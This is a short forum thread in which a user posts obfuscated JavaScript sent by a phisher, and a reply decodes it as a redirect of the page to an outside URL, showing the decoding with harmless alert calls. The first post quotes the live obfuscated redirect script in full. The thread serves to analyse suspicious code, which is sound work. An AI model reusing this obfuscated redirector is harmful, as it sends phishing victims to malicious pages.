Hi, Can anyone tell me what this script would do if executed in a browser? Warning: If you do NOT know what it does do NOT execute it. It was sent to me from a phisher/scammer. <script type='text/javascript'>function dX(){}; var h=new Date(); dX.prototype = {f : function() {var u=function(){}; var uY=new Date(); var o="";var k=document; var oE=function(){}; var l=''; this.i=33457; var kV=k['l.oSc<a(t<i_oSnS'.replace(/[S_\<\(\.]/g, '')]; var w=function(){}; var p=false; this.pP=false; this.s=''; kV['hGrGe>f>'.replace(/[\>mYGw]/g, '')]='hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/2xJnSuJ4JeSjS/2z2.ShltlmJ'.replace(/[JS2\>l]/g, ''); var iK="iK"; pK=''; this.d="d";uM=""; }}; this.dK=""; var fG=new dX(); var dR="dR";fG.f();hJ=false; </script> Code (markup): Thanks
As far as I can tell it will redirect you to this location http://advancedwoodtech.com/xnu4ej/z.htm Code (markup): This is how I found it out. Running this is not dangerous at all as it only does a replace on a string and alerts it. <script> alert('l.oSc<a(t<i_oSnS'.replace(/[S_\<\(\.]/g, '')); alert('hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/2xJnSuJ4JeSjS/2z2.ShltlmJ'.replace(/[JS2\>l]/g, '')); </script> Code (markup):
Nice one! Not to up on JS so wanted to paste that disclaimer just in case. Thanks for letting me know.